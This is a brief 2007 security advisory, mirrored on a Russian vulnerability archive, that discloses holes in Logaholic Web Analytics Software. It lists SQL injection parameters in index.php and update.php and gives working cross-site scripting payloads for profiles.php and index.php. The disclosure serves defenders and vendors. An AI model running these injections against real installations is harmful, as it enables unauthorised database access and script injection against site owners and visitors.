Уведомление о безопасности: Logaholic Web Analytics Software - ошибки и эксплоиты

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
  Jupiter Cms Multiple Vulnerabilities
  [waraxe-2007-SA#060] - Sensitive info disclosure in CuteNews <= 1.4.5
  [ISecAuditors Security Advisories] Tikiwiki CMS is vulnerable to path traversal attack
  Tikiwiki 1.9.8.3 tiki-special_chars.
php XSS Vulnerability

From: malibu.r_(at)_hotmail.com <malibu.r_(at)_hotmail.com>
Date: 24 декабря 2007 г.
Subject: Logaholic Web Analytics Software

# Logaholic Web Analytics Software
# Bug found by malibu.r
# Contact: malibu.r@hotmail.com
#

[*]SQL Injection

GET /logaholic/index.php?conf=nameofprofile&from=SQL INJECTION
GET /logaholic/update.php?conf=nameofprofile&page=SQL INjection

[*]Cross Site Scripting

POST variable "newconfname" in profiles.php?conf=nameofprofile to
>"><ScRiPt%20%0a%0d>alert(xss)%3B</Sc
RiPt> in /logaholic/profiles.php

index.php?conf=<img+src=http://testingsite.com/yep.gif+onload=alert(812051443)
>

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород